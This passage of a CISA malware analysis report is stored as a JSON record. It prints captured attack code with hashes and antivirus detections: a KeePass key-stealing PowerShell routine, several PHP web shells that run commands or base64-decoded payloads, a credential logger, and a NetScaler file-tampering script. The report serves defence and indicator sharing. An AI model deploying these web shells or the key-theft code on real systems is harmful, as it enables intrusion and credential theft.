{\r\n        $WMIProcess = Get-\r\n        WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\r\n        $ExecutablePath =\r\n        $WMIProcess | Select-Object -Expand ExecutablePath\r\n        Write-Verbose \"Examining KeePass\r\n        process $($KeePassProcess.ID) for master keys\"\r\n        $Keys = $Assembly.GetType\r\n        ('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @\r\n        ([System.Diagnostics.Process]$KeePassProcess))\r\n        if($Keys)\r\n        {\r\n        ForEach\r\n        ($Key in $Keys)\r\n        {\r\n            ForEach($UserKey in $Key.UserKeys)\r\n            {\r\n            $KeyType = $UserKey.GetType().Name\r\n            $UserKeyObject = New-Object PSObject\r\n            $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\r\n            $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\r\n            $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\r\n            $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\r\n            $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\r\n            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\r\n            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\r\n            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\r\n            $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\r\n            if($KeyType -eq 'KcpPassword')\r\n            {\r\n                $Plaintext =\r\n                [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\r\n            }\r\n            else\r\n            {\r\n                $Plaintext = [Convert]::ToBase64String\r\n                ($UserKey.plaintextBlob)\r\n            }\r\n            $UserKeyObject | Add-\r\n            Member Noteproperty 'Plaintext' $Plaintext\r\n            if($KeyType -eq 'KcpUserAccount')\r\n            {\r\n                try\r\n                {\r\n                $WMIProcess = Get-WmiObject\r\n                win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\r\n                $UserName =\r\n                $WMIProcess.GetOwner().User\r\n                $ProtectedUserKeyPath = Resolve-Path -Path\r\n                \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\"\r\n                -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\r\n                $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\r\n                }\r\n                catch\r\n                {\r\n                Write-Warning \"Error\r\n                enumerating the owner of $($KeePassProcess.ID) : $_\"\r\n                }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 14 of 26\n\n}\r\n            else\r\n            {\r\n                $UserKeyObject | Add-Member\r\n                Noteproperty 'KeyFilePath' $UserKey.keyFilePath\r\n            }\r\n            $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\r\n            $UserKeyObject\r\n            }\r\n        }\r\n        }\r\n        else\r\n        {\r\n        Write-Verbose \"No keys found for $($KeePassProcess.ID)\"\r\n        }\r\n    }\r\n    else\r\n    {\r\n        Write-Warning \"Only KeePass 2.X is supported at this time.\"\r\n    }\r\n    }\r\n}\r\n—End Malicious Powershell Code—\r\n10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nTags\r\ntrojan\r\nDetails\r\nName KeeTheft.dll\r\nSize 738304 bytes\r\nType PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 dc8a91125f273090cd8d76e9e588a074\r\nSHA1 3455ecca61a280a1056adb69077e0c652daa3516\r\nSHA256 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\nSHA512 dc25e2ff93871edeb751e99cafe0717163817bfa85bd41c941c1c8b1b5ad2c63b9935060475b65dda69edce358f2759160ce94ad663c041bd\r\nssdeep 12288:NxOU+wucIYOW1ENXKUEHI7apPYEMMIjS3K9TodHNSIIcOECQ:NETcIYOWCNXKUEHI7apPYEMJ9TgHDpC\r\nEntropy 6.023616\r\nAntivirus\r\nAhnlab Trojan/Win32.Tiggre\r\nAvira TR/PSW.KeeThief.vmqvn\r\nBitDefender Gen:Variant.Ursu.299323\r\nESET a variant of MSIL/PSW.KeeThief.A trojan\r\nEmsisoft Gen:Variant.Ursu.299323 (B)\r\nIkarus Trojan.MSIL.PSW\r\nK7 Password-Stealer ( 005253fd1 )\r\nMcAfee GenericRXIL-CE!DC8A91125F27\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 15 of 26\n\nMicrosoft Security Essentials PWS:MSIL/KeeThief\r\nSymantec Trojan.Gen.MBT\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2016-07-11 14:54:24-04:00\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nFile Description KeeTheft\r\nInternal Name KeeTheft.exe\r\nLegal Copyright Copyright © 2016\r\nOriginal Filename KeeTheft.exe\r\nProduct Name KeeTheft\r\nProduct Version 1.0.0.0\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\ncb77191ad61291924938362fbb902f32 header 512 2.783814\r\n1fb4a5b09d9141362ed994c8a99b3cf5 .text 735744 6.030226\r\n2801de31bb6a6306f169ef81e5589521 .rsrc 1536 4.076679\r\necf88595c12869be20d521f1934da506 .reloc 512 0.101910\r\nRelationships\r\n10836bda2d... Related_To 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nDescription\r\nThis file is a Windows executable written in the .NET programming language. This binary has been identified as the\r\nKeyTheft application, which is part of the \"KeeThief\" open source project. The primary purpose of this executable is to\r\nassist in the stealing of password credentials from the \"KeePass Password Safe\" password management utility software.\r\nUsing this malware, an operator will be able to decrypt and extract passwords from a \"KeePass\" safe, allowing access to\r\nsensitive user data and possibly the ability pivot to the victim's user accounts outside of the victim's network.\r\nScreenshots\r\nFigure 1 - Screenshot of a list of some of the source .NET files used to build this app. It matches the name of some of the\r\nsource files contained within the \"KeeThief\" open source project.\r\nFigure 2 - Screenshot of a list of source files within the \"KeeThief\" open source project.\r\nFigure 3 - Screenshot of .NET code decompiled from the \"KcpPassword\" file contained within this binary.\r\nFigure 4 - Screenshot of .NET code found on the \"KeeThief\" project's GitHub page, which matches the code extracted from\r\nthis malicious file.\r\n51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 16 of 26\n\nTags\nwebshell\nDetails\nName df5bd34799e200951fcce77c1c0b42af.php\nSize 585 bytes\nType PHP script, ASCII text\nMD5 b3b1dea400464ab5dd55e44766357957\nSHA1 507a04d3faed99cee089da042913d63f1813fc2a\nSHA256 51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21\nSHA512 f7c21a4171942edd7e0d4ab7c0b3a3a1666a3dbbed14da6af4ae3c41c7607301c0c3bc83782e22c47fe40b5297a9c1374d645d04ce3b22ceb\nssdeep 12:yDsNaficuJwHCaBzVBbgKOBUbC3c2vaveaXivglQEyKzbShL:4sCicuJwiaRVVeubCs+ieaXiY1HShL\nEntropy 5.136531\nAntivirus\nNo matches found.\nYARA Rules\nNo matches found.\nssdeep Matches\nNo matches found.\nDescription\nThis file is a component of a malicious web shell. It contains two PHP code blocks. The first block extracts information\nfrom a dictionary data structure named \"$_FILES\". Analysis indicates the script extracts provided file data, such as file\nname, file type, file size, and the files in a temporary location. The block then calls a function named\n“move_uploaded_files”. This PHP block is presumably utilized by a web shell framework to allow a remote operator to\nmove uploaded files to a new location on the compromised system. The code contained in the function\n“move_uploaded_file” was not available for analysis.\nThe second PHP script block parses the variable $_GET for the value associated with the “cmd” key value. This value is\nthen executed on the target system using the “system()” function. This PHP block is utilized by a web shell framework to\nallow a remote operator to remotely execute commands on a compromised system. Displayed below is the (partial) code\ncontained within this file:\n—Begin PHP Script—\nif ($_FILES[\"file\"][\"error\"] \u003e 0)\n{\necho \"Error: \" . $_FILES[\"file\"][\"error\"] . \"  \n\";\n}\nelse\n{\necho \"FILENAME: \" . $_FILES[\"file\"][\"name\"] . \"  \n\";\necho \"FILETYPE: \" . $_FILES[\"file\"][\"type\"] . \"  \n\";\necho \"FILETYPE: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB  \n\";\necho \"FILETEMPPATH: \" . $_FILES[\"file\"][\"tmp_name\"] . \"  \n\";\nmove_uploaded_file($_FILES[\"file\"][\"tmp_name\"], $_FILES[\"file\"][\"name\"]);\n}\n?\u003e\n?php\nif (strlen($_GET[\"cmd\"]) \u003e 0)\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\nPage 17 of 26\n\n{\r\n    system($_GET[\"cmd\"]);\r\n}\r\n—End PHP Script—\r\n547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c\r\nTags\r\nbackdoortrojanwebshell\r\nDetails\r\nName df5bd34799e200951fcce77c1c0b42af_y.php\r\nSize 28 bytes\r\nType PHP script, ASCII text\r\nMD5 e11f9350ced37173d1e957ffe7d659b9\r\nSHA1 ec6d63fd5695c470bc3daea500b270eca85e81f4\r\nSHA256 547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c\r\nSHA512 ecd2ae19d5b3264821a1d88a265973b32724d2fc85b4225a23d4bc0c1aad6e8280a78de1f9024a19461a1c1b9209222eb51cb57f980c11a86\r\nssdeep 3:3/a4nL:ycL\r\nEntropy 4.521641\r\nAntivirus\r\nESET PHP/WebShell.NGI trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTG\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a part of a larger malicious web shell framework. It is designed to extract data contained within a Request object,\r\nBase64 decode the data associated with a redacted parameter, and then execute this data on the compromised system. The\r\ndata is executed using the \"eval()\" function indicating it is expected to be a malicious JavaScript payload. The (partial)\r\nJavaScript contained within this file is displayed below:\r\n—Begin Extracted JavaScript—\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%try\r\n{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item[\"\r\n[Redacted]\"])),\"unsafe\"); } catch(e) {}%\u003e\r\n—End Extracted JavaScript—\r\nb443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249\r\nTags\r\nbackdoor\r\nDetails\r\nName df5bd34799e200951fcce77c1c0b42af_z.php\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 18 of 26\n\nSize 30 bytes\r\nType PHP script, ASCII text\r\nMD5 8f9567ca566ab5f79081d5d17c79ee41\r\nSHA1 01c3da91407c43d9edee751bbd2e30e081165fdc\r\nSHA256 b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249\r\nSHA512 45ba8f2dac9cf0982937feb42dd6a782e84a76fae84d8168d170e52908bc40033a7fab58395c4247093af3b3cb38532563aac00a153641420b\r\nssdeep 3:3/MJHo6:0JI6\r\nEntropy 4.640224\r\nAntivirus\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTG\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a malicious PHP script. The PHP block contained within this script retrieves data from the “k0” key contained\r\nwithin the local \"$_POST\" variable. This data is then immediately executed on the compromised system utilizing the\r\n“system()” function. This tiny script is utilized to allow an operator to remotely execute commands on a compromised\r\nsystem. The (partial) code contained within the script is displayed below:\r\n—Begin PHP Script—\r\nphp system($_POST[\"k0\"]);\r\n—End PHP Script—\r\n2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849\r\nTags\r\nwebshell\r\nDetails\r\nName prev_sh\r\nSize 872 bytes\r\nType Rich Text Format data, version 1, ANSI\r\nMD5 ac07005f06ac63e5b1b0c1cd15a7a060\r\nSHA1 74fe38fb9b63e3d1ff112567d770aef118a31195\r\nSHA256 2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849\r\nSHA512 f2560ae09815a3011086ec1ecbdfb0102d1063dcb64a81cfb4f0d18307f0851c6f4738103024e172adb71f14982c5edcc88592f9e03f04605f8\r\nssdeep 24:EnAWZJMOvOIBCotIYZa/UKt0K7uxuOv69p:EnAWZOkOm7tIYZa/UbjUkep\r\nEntropy 5.386700\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 19 of 26\n\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains bash shell scripting code. The shell script is displayed below:\r\n—Begin Shell Script—\r\ncd /netscaler/portal/scripts;\r\nfor f in tips.pl themes.pl navthemes.pl rmbm.pl picktheme.pl newbm.pl savecolorprefs.pl subscription.pl\r\nPersonalBookmark.pl;\r\ndo if [ -f $f ] \u0026\u0026 ! grep \"/\\\\\\\\/\\\\\\\\\\.\\\\\\\\\\.\\\\\\\\// .*df5bd34799e200951fcce77c1c0b42af\" $f;\r\nthen sed -i .bk 's:use vars.*:use vars qw (%c);\r\nif($ENV{REQUEST_URI} =~ /\\\\/\\\\.\\\\.\\\\// \\\u0026\\\u0026 $ENV{REQUEST_URI} !~ /df5bd34799e200951fcce77c1c0b42af/)\r\n{my $d=\"/netscaler/portal/templates\";\r\nopendir(D,$d);\r\nwhile(my $f=readdir(D))\r\n{if($f =~ /.xml/i)\r\n{unlink(\"$d/$f\");}}\r\nclosedir(D);\r\nexit 0;}:'\r\n$f;\r\nfi;\r\ndone;\r\nrm -f *.b”\r\n—End Shell Script—\r\nAnalysis indicates this shell script attempts to read the following system scripts contained on a victim's netscaler device and\r\nmodify them if specific content is not present within the scripts:\r\n—Begin Modified Perl Scripts—\r\ntips.pl\r\nthemes.pl\r\nnavthemes.pl\r\nrmbm.pl\r\npicktheme.pl\r\nnewbm.pl\r\nsavecolorprefs.pl\r\nsubscription.pl\r\nPersonalBookmark.pl\r\n—End Modified Perl Scripts—\r\nThe netscaler system perl scripts, modified by this application, were not available for analysis.\r\nThe malware searches the perl scripts using an IF statement, which contains a REGEX rule ensuring the perl script does not\r\ncontain the string *df5bd34799e200951fcce77c1c0b42af\". If the string is not present in the script, the malware will execute\r\nthe following SED command which appears to add executable code to the system perl scripts:\r\n—Begin SED Command—\r\nsed -i .bk 's:use vars.*:use vars qw (%c);\r\nif($ENV{REQUEST_URI} =~ /\\\\/\\\\.\\\\.\\\\// \\\u0026\\\u0026 $ENV{REQUEST_URI} !~ /df5bd34799e200951fcce77c1c0b42af/)\r\n{my $d=\"/netscaler/portal/templates\";\r\nopendir(D,$d);\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 20 of 26\n\nwhile(my $f=readdir(D))\r\n{if($f =~ /.xml/i)\r\n{unlink(\"$d/$f\");}}\r\nclosedir(D);\r\nexit 0;}:'\r\n—End SED Command—\r\nAnalysis of the code above indicates it will clear out all files in the \"/netscaler/portal/templates\" directory matching the\r\nregex rule “/.xml/i” if the systems \"$ENV(REQUEST_URI)\" variable does not contain the string\r\n\"df5bd34799e200951fcce77c1c0b42af\". This code modification appears to be utilized as part of a technique to ensure the\r\nsystems \"$ENV{REQUEST_URI}\" variable continues to point to a web application with the file name containing the string\r\n\"df5bd34799e200951fcce77c1c0b42af\".\r\nThis report contains the following web shell applications that contain the string \"df5bd34799e200951fcce77c1c0b42af\" in\r\nthe file's name:\r\n--Begin Files--\r\ndf5bd34799e200951fcce77c1c0b42af.php    (51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21)\r\ndf5bd34799e200951fcce77c1c0b42af_y.php (547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c)\r\ndf5bd34799e200951fcce77c1c0b42af_z.php (b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249)\r\n--End Files--\r\nThese web shell applications provide an operator remote C2 access over a victim's system.\r\nb36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a\r\nTags\r\nbackdoortrojanwebshell\r\nDetails\r\nName tiny_webshell\r\nSize 402 bytes\r\nType Rich Text Format data, version 1, ANSI\r\nMD5 82e6e545c9863ed9f0df1e78d2457d13\r\nSHA1 fdc411014e747715a2d6de93723865ac5134b600\r\nSHA256 b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a\r\nSHA512 cbe7374679872f635564b6da357b806ffd11f86881ea9fe9286682a73e49b152b88b01c9f6c872fb3ac04044b5d2955c92b03793877e6ecbc\r\nssdeep 6:L4vrWK+dSQSm+BhYrJDeSykilDo5WZuXP7SX8R6H4cYzat7qq4+u13HfEW2A6xQ0:HKUSmsY+1AWZuDSXA6/YXF3M/Qq3\r\nEntropy 5.136055\r\nAntivirus\r\nESET PHP/WebShell.NBV trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Chopper.C!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a small PHP script block that is designed to receive a web POST, extract and Base64 decode its contents,\r\nand then execute this data on the compromised system. The code contained within this file is displayed below:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 21 of 26\n\n—Begin File Data—\r\nphp @eval(base64_decode($_POST['citrix@[Redacted]']));?\u003e\r\n—End File Data—\r\nAs illustrated within this data, the POST parameter utilized to deliver data to the script block is expected to be\r\n\"citrix@[Redacted]\". It is believed this script is related to the Tiny web shell.\r\n8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3\r\nTags\r\nremote-access-trojanwebshell\r\nDetails\r\nName content\r\nSize 5599 bytes\r\nType PHP script, ASCII text\r\nMD5 ce868f9ed3ebd9036456da37749ab7b9\r\nSHA1 6099d6e21fd81c2fb85e9b157f64d2cad8fec310\r\nSHA256 8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3\r\nSHA512 e69966437bb4c3a819a425c6d8197fe8b7a01d2396eaa9d8f88312834e85eba8bb53f36aceefe306cbc3affe6e843afc2a833d89f02a5e7392d\r\nssdeep 96:NqNB3EXRKYIkbu0J5vmkI0K1sZMHXN+XNyBa9M6XN2XN7Emf+qsTMUoPk4xe0tM9:O3EhFIcT+sKSZMdMyBCMQk7d5I\r\nEntropy 5.298102\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a modified copy of the open source web shell known as Chunky Tuna and provides a remote operator C2\r\ncapabilities over a compromised system. Displayed below is some of the code extracted from this script:\r\n—Begin Extracted Code—\r\n$headers = getallheaders();\r\n// if the header doesn't match the key\r\nif (array_key_exists('X-Pwd', $headers) \u0026\u0026 $headers['X-Pwd'] !== \"Ddzq1Mg6rIJDCAj7ch78vl3ZEGcXnqKjs97gs5y\") {\r\n_log(\"wrong pwd: \");\r\ndie();\r\n}\r\n// NOP, for setting cookies\r\nif (array_key_exists('X-Nop', $headers) \u0026\u0026 $headers[\"X-Nop\"] === \"1\") {\r\n_log(\"[X-Nop] Request\".print_r($headers,true));\r\nreturn;\r\n}\r\n// determine operation type\r\nif (array_key_exists('X-Type', $headers)) {\r\n$opType = $headers[\"X-Type\"];\r\n} else {\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 22 of 26\n\n$opType = \"\";\r\n}\r\n—————————\r\nwhile ($continue) {\r\n        $read = array($pipes[1], $pipes[2]);\r\n        // $write = array($pipes[0]);\r\n        $write = NULL;\r\n        $except = NULL;\r\n        @session_start();\r\n        if ($_SESSION[\"data\"] != \"\") {\r\n            _log(\"Got data!\");\r\n            // write it\r\n            fwrite($pipes[0], $_SESSION[\"data\"]);\r\n            // wipe it\r\n            $_SESSION[\"data\"] = \"\";\r\n            $activity_time = microtime(true);\r\n        }\r\n        session_write_close();\r\n        $ss = stream_select($read, $write, $except, $tv_sec = 0, $tv_usec =50000);\r\n        // bleh. not the best inactivity timeout...\r\n        $now = microtime(true);\r\n        if ($now - $activity_time \u003e 30) {\r\n            $continue = false;\r\n            _log(\"Max inactivity time exceeded\");\r\n            break;\r\n        }\r\n        // _log(stream_get_contents($pipes[1]));\r\n        // next round\r\n        if ($ss === 0) continue;\r\n        if ($ss === false) {\r\n            _log(\"\\nServer shutting down\");\r\n            $continue = false;\r\n            break;\r\n        }\r\n        if ($ss \u003c 1) {\r\n            _log(\"\\nNothing to do\");\r\n            continue;\r\n        }\r\n—End Extracted Code—\r\nFigures 5 and 6 contain similar code from the open source Chunky Tuna web shell.\r\nScreenshots\r\nFigure 5 - Code located on the Chunky Tuna web shell project website. This sample has very similar code.\r\nFigure 6 - Code located on the Chunky Tuna web shell project website. This sample has very similar code.\r\n3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c\r\nTags\r\nwebshell\r\nDetails\r\nName content\r\nSize 365 bytes\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 23 of 26\n\nType PHP script, ASCII text, with CRLF line terminators\r\nMD5 750b1bf7269ffc5860166efa8af6b34e\r\nSHA1 f4d152a700d93703592dc3652ff7b52ef00b4f7e\r\nSHA256 3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c\r\nSHA512 fcae4efb50a6e72363edfd822939ff9204ca2368963ad825e5c8b5a256255e93bc8f556cd91aa4629c53a117892e03d95aad9c4716ded27300\r\nssdeep 6:99YpbSYDFYE9LO3b6bLAztLUJD/9RH80Ab6bLAztLUJOdLGX80Ab6bLAztLUJI5t:96RSurpOryLAztQ7H0WLAztzGX0WLAz/\r\nEntropy 5.142417\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a single PHP script block. The script is designed to listen for incoming HTTP GET connections. The script\r\nwill extract data from the ‘u’ parameter, and place it into a variable named \"$username\". The script will also extract data\r\nfrom the ‘p’ parameter, and place it into a variable named \"$password\". This data is then placed into the function\r\n\"file_put_contents\", along with the static string \"netscaler.1\". It appears this malicious web shell is designed to allow a\r\nremote operator to remotely add accounts to a compromised NetScaler device. This file contains the following (partial) PHP\r\nscript code:\r\n—Begin PHP Code—\r\nphp\r\n$username= $_GET['u'];\r\n$password= $_GET['p'];\r\nif ($username !=\"undefined\"){\r\nfile_put_contents(\"netscaler.1\" , \"Username:\".$username.PHP_EOL ,FILE_APPEND);\r\nfile_put_contents(\"netscaler.1\" , \"Password:\".$password.PHP_EOL ,FILE_APPEND);\r\nfile_put_contents(\"netscaler.1\" , \"-----------------------------------------------------\".PHP_EOL ,FILE_APPEND);\r\n}\r\n—End PHP Code—\r\n4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756\r\nTags\r\nbackdoortrojanwebshell\r\nDetails\r\nName content\r\nSize 57 bytes\r\nType PHP script, ASCII text, with no line terminators\r\nMD5 fd6c1e1fbe93a6c1ae97da3ddc3a381f\r\nSHA1 a5225159267538863f8625050de94d880d54d2d4\r\nSHA256 4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756\r\nSHA512 ea392b3dd9c323ae5e41d68394a56bb13914e9311f2d98648c9b5560af3bb9f85b4ac4d5a947bce5658fa230b3902fb574e5247c626643150\r\nssdeep 3:E1uWATR7cNT2xrXMnFNXC4/:EEW2A6xQnqO\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 24 of 26\n\nEntropy 4.922815\r\nAntivirus\r\nESET PHP/WebShell.NBV trojan\r\nMicrosoft Security Essentials Backdoor:PHP/Dirtelti.MTF\r\nNANOAV Trojan.Html.Backdoor.fqkken\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file contains a small PHP script block and has been identified as a malicious web shell. It is designed to accept a POST\r\nrequest and extract the data associated with the parameter 'citrix@[Redacted]’. This data will then be decoded using a\r\nfunction named \"base64_decode\". The data will then be executed via the PHP \"eval\" function, indicating the application\r\nexpects this data to be additional PHP code. This web shell will allow a remote operator to execute additional PHP payloads\r\non a compromised system. This file contains the following (partial) PHP code:\r\n—Begin PHP—\r\nphp @eval(base64_decode($_POST['citrix@[Redacted]']));\r\n—End PHP—\r\nRelationship Summary\r\n99344d862e... Related_To 28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea\r\n28bc161df8... Related_To 99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc\r\n913ee2b048... Related_To 10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334\r\n10836bda2d... Related_To 913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 25 of 26\n\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\n1-844-Say-CISA\r\nCISA Central  (UNCLASS)\r\nCISA SIPR  (SIPRNET)\r\nCISA IC  (JWICS)\r\nCISA continuously strives to improve its products and services. You can help by answering a very short series of questions\r\nabout this product at the following URL: https://www.cisa.gov/forms/feedback/\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a\r\nPage 26 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a"
	],
	"report_names": [
		"ar20-259a"
	],
	"threat_actors": [],
	"ts_created_at": 1775439155,
	"ts_updated_at": 1775791306,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.pdf",
		"text": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.txt",
		"img": "https://archive.orkl.eu/72d04d5e11286840e3d04797b04757cc62fc9b7d.jpg"
	}
}